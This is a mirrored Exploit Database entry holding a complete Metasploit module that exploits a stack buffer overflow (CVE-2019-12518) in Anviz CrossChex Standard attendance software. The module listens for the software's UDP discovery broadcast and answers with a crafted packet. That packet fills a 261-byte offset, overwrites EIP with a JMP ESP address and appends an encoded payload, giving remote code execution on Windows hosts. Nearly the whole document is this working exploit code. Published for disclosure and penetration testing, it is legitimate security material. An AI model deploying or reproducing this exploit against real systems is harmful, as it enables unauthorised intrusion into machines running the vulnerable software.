Anviz CrossChex – Buffer Overflow (Metasploit)

• Exploit Database
• 120 阅读

• 作者： Metasploit
  日期： 2020-02-17
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48092/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83

  ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking PACKET_LEN = 10   include Msf::Exploit::Remote::Udp   def initialize(info = {}) super(update_info(info, 'Name'=> 'Anviz CrossChex Buffer Overflow', 'Description' => %q{ Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast, triggering a stack buffer overflow. }, 'Author' => [ 'Luis Catarino <lcatarino@protonmail.com>',# original discovery/exploit 'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit 'agalway-r7',# Module creation 'adfoster-r7' # Module creation ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2019-12518'], ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'], ['EDB', '47734'] ], 'Payload'=> { 'Space'=> 8947, 'DisableNops' => true }, 'Arch' => ARCH_X86, 'EncoderType' => Msf::Encoder::Type::Raw, 'Privileged' => true, 'Platform' => 'win', 'DisclosureDate' => '2019-11-28', 'Targets'=> [ [ 'Crosschex Standard x86 <= V4.3.12', { 'Offset' => 261, # Overwrites memory to allow EIP to be overwritten 'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data 'Shift' => 4 # Positions payload to be written at beginning of ESP } ] ], 'DefaultTarget'=> 0 )) deregister_udp_options register_options( [ Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'), Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'), OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100]) ]) end   def exploit connect_udp   res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil)) if res.empty? fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast") end   print_status "CrossChex broadcast received, sending payload in response" sploit = rand_text_english(target['Offset']) sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP sploit << payload.encoded   udp_sock.sendto(sploit, host, port) print_status "Payload sent" end end